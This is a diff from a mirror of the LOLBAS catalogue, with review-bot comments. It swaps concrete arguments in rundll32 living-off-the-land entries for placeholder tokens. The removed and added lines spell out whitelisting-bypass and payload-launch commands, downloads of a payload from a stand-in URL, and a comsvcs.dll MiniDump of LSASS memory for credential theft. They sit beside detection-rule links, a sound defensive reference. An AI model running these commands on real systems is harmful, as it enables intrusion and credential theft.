mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
@@ -4,7 +4,7 @@ Description: Utility for installing software and drivers with rundll32.exe
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
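Review bot: the placeholder on the new Command line is `{PATH:.inf}`, while the otherwise identical LaunchINFSection / InstallHinfSection / SetupInfObjectInstallAction entries for ieadvpack.dll, setupapi.dll and syssetup.dll in this same change use `{PATH_ABSOLUTE:.inf}`; pick one token for the .inf argument across the rundll32 entries so the placeholder vocabulary stays consistent. The Description on this entry still says "local or remote", so if remote paths are meant to be covered the token should say so (the desk.cpl hunks use a separate `{PATH_SMB:.scr}` form for that case).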
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
- Command: rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
- Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
Category: Execute
@@ -31,7 +31,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
- Command: rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
@@ -40,7 +40,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
- Command: rundll32 advpack.dll, RegisterOCX {CMD}
Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
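Review bot: the new Command line `rundll32 advpack.dll, RegisterOCX {CMD}` drops the double quotes that the old line `rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"` carried around the argument; a `{CMD}` value will normally contain spaces, so keep the quotes in the template (`RegisterOCX "{CMD}"`) so the rendered entry still shows the argument as one quoted string. The same applies to the ieadvpack.dll RegisterOCX `{CMD}` line later in this change.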
@@ -4,7 +4,7 @@ Description: Desktop Settings Control Panel
Author: Hai Vaknin
Created: 2022-04-21
Commands:
- Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr
- Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}
Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function.
Usecase: Launch any executable payload, as long as it uses the .scr extension.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
- Command: rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
Usecase: Launch any executable payload, as long as it uses the .scr extension.
Category: Execute
@@ -1,11 +1,11 @@
---
Name: Dfshim.dll
Description: ClickOnce engine in Windows used by .NET
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
Description: Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)
Usecase: Use binary to bypass Application whitelisting
Category: AWL Bypass
Privileges: User
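Review bot: the hunk bundles an unrelated edit with the placeholder substitution: `Author: 'Oddvar Moe'` becomes `Author: Oddvar Moe`, which is a YAML quoting cleanup rather than part of the placeholder work; either call it out in the commit message or move it to a separate formatting commit so the diff stays reviewable. Also, `{REMOTEURL}` here has no type suffix while the scrobj.dll and shimgvw.dll hunks in this change use `{REMOTEURL:.exe}`; if the suffix is optional when the URL does not point at a single file, document that rule next to the placeholder definitions.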
@@ -19,8 +19,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:
@@ -4,7 +4,7 @@ Description: INF installer for Internet Explorer. Has much of the same functiona
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
- Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll}
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
Category: Execute
@@ -31,7 +31,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
- Command: rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe}
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
@@ -40,7 +40,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
- Command: rundll32 ieadvpack.dll, RegisterOCX {CMD}
Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
@@ -4,9 +4,9 @@ Description: Internet Browser DLL for translating HTML code.
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
- Command: rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Category: Execute
Privileges: User
MitreID: T1218.011
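Review bot: the Usecase line appears twice in this hunk with identical visible text ("Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed."), so whatever differs between the two versions is whitespace or quoting only; a -4,9 +4,9 hunk whose purpose is the Command placeholder should not carry a no-op line, so drop that edit unless the difference is deliberate. Separately, the Description here keeps "a(n) URL (information) file" while the url.dll hunk in this same change rewrites the equivalent line to "a .url (information) file"; align the wording across the three OpenURL entries (ieframe.dll, shdocvw.dll, url.dll).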
@@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
- Command: rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}
Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)."
Usecase: Launch an HTA application.
Category: Execute
@@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\mshtml.dll
- Path: c:\windows\syswow64\mshtml.dll
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:
@@ -4,7 +4,7 @@ Description: Microsoft HTML Viewer
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
- Command: rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}
Description: Launch executable by calling the LaunchApplication function.
Usecase: Launch an executable.
Category: Execute
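Review bot: the context line in this hunk header reads `Description: Microsoft HTML Viewer`, which is the mshtml.dll entry's description and does not describe pcwutl.dll; that is a pre-existing copy-paste error rather than something this change introduces, but since the file is being edited anyway, correct the Description in the same commit so the rendered entry does not misidentify the library.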
@@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\pcwutl.dll
- Path: c:\windows\syswow64\pcwutl.dll
Code_Sample:
- Code:
Detection:
- Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
@@ -4,8 +4,8 @@ Description: Windows Script Component Runtime
Author: Eral4m
Created: 2021-01-07
Commands:
- Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe.
- Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}
Description: Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.
Usecase: Download file from remote location.
Category: Download
Privileges: User
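Review bot: the rewritten Description drops the on-disk location the old text gave (`%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe`) in favour of "saves it to INetCache"; the full path and the `[1]` suffix naming are exactly what an analyst searches for after a suspected download, so keep them in the new wording. It also changes "rundll32.exe will download the file" to "scrobj.dll attempts to load a file", which is a different claim about which component performs the fetch; if that is a deliberate correction, say so in the commit message, otherwise keep the original phrasing.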
@@ -4,7 +4,7 @@ Description: Windows Setup Application Programming Interface
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
Usecase: Load an executable payload.
Category: Execute
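Review bot: with the placeholder substituted, this Command line is byte-identical to the one in the preceding AWL Bypass entry of the same file (`rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}`); the old names `shady.inf` and `calc_exe.inf` at least hinted that the two entries differ only in what the .inf contains (a scriptlet reference versus an executable launch). Either state that in each entry's Description or give the placeholder a hint of the INF payload, otherwise the two rows render as duplicates. The same collapse happens in the two syssetup.dll hunks of this change.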
@@ -4,7 +4,7 @@ Description: Shell Doc Object and Control Library.
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
- Command: rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}
Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
Category: Execute
@@ -4,7 +4,7 @@ Description: Windows Shell Common Dll
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
- Command: rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}
Description: Launch a DLL payload by calling the Control_RunDLL function.
Usecase: Load a DLL payload.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe}
Description: Launch an executable by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload.
Category: Execute
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
- Command: rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args}
Description: Launch command line by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload.
Category: Execute
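Review bot: the new line `{PATH:.exe} {CMD:args}` drops the quotes from both arguments of the old line `"cmd.exe" "/c echo hi"`; the second argument is an argument string that will normally contain spaces, and the quoting is what keeps `/c echo hi` a single parameter, so keep the quotes in the template (`"{PATH:.exe}" "{CMD:args}"`) so readers and detection authors see the form the original example actually used.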
@@ -34,8 +34,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\shell32.dll
- Path: c:\windows\syswow64\shell32.dll
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml
@@ -4,7 +4,7 @@ Description: Photo Gallery Viewer
Author: Eral4m
Created: 2021-01-06
Commands:
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}
Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
Usecase: Download file from remote location.
Category: Download
@@ -4,7 +4,7 @@ Description: Windows NT System Setup
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
Category: AWL Bypass
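Review bot: besides the placeholder, the new Command line changes the binary name from `rundll32.exe` to `rundll32` (`rundll32.exe syssetup.dll,...` becomes `rundll32 syssetup.dll,...`); every other hunk in this change keeps whatever form the old line had, so this looks accidental and should be reverted to keep the diff limited to the placeholder substitution.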
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: INF
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
Usecase: Load an executable payload.
Category: Execute
@@ -4,7 +4,7 @@ Description: Internet Shortcut Shell Extension DLL.
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
- Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}
Description: Launch a HTML application payload by calling OpenURL.
Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
Category: Execute
@@ -13,9 +13,9 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: HTA
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes.
- Command: rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}
Description: Launch an executable payload via proxy through a .url (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file.
Category: Execute
Privileges: User
MitreID: T1218.011
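Review bot: this hunk changes more than the placeholder: the Description goes from "a(n) URL (information) file" to "a .url (information) file" and the Usecase loses "with or without quotes". The ieframe.dll and shdocvw.dll OpenURL entries in the same change keep the old wording of both lines, so either apply the same rewording there or leave this one untouched; the "with or without quotes" remark is also the only place these entries record that quoting the path is optional, which anyone writing a command-line detection for these OpenURL invocations needs to know.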
@@ -31,7 +31,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
- Command: rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}
Description: Launch an executable by calling FileProtocolHandler.
Usecase: Launch an executable.
Category: Execute
@@ -61,8 +61,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\url.dll
- Path: c:\windows\syswow64\url.dll
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:
@@ -4,7 +4,7 @@ Description: Compressed Folder library
Author: LOLBAS Team
Created: 2018-05-25
Commands:
- Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
- Command: rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}
Description: Launch an executable payload by calling RouteTheCall.
Usecase: Launch an executable.
Category: Execute
@@ -4,7 +4,7 @@ Description: COM+ Services
Author: LOLBAS Team
Created: 2019-08-30
Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump
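Review bot: the context line `Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.` carries a typo ("in turns" should read "in turn"); since this file is already being edited to swap `[LSASS_PID]` for `{LSASS_PID}`, fix the wording in the same change rather than leaving it for a follow-up.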
@@ -24,4 +24,3 @@ Resources:
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Acknowledgement:
- Person: modexp
Handle: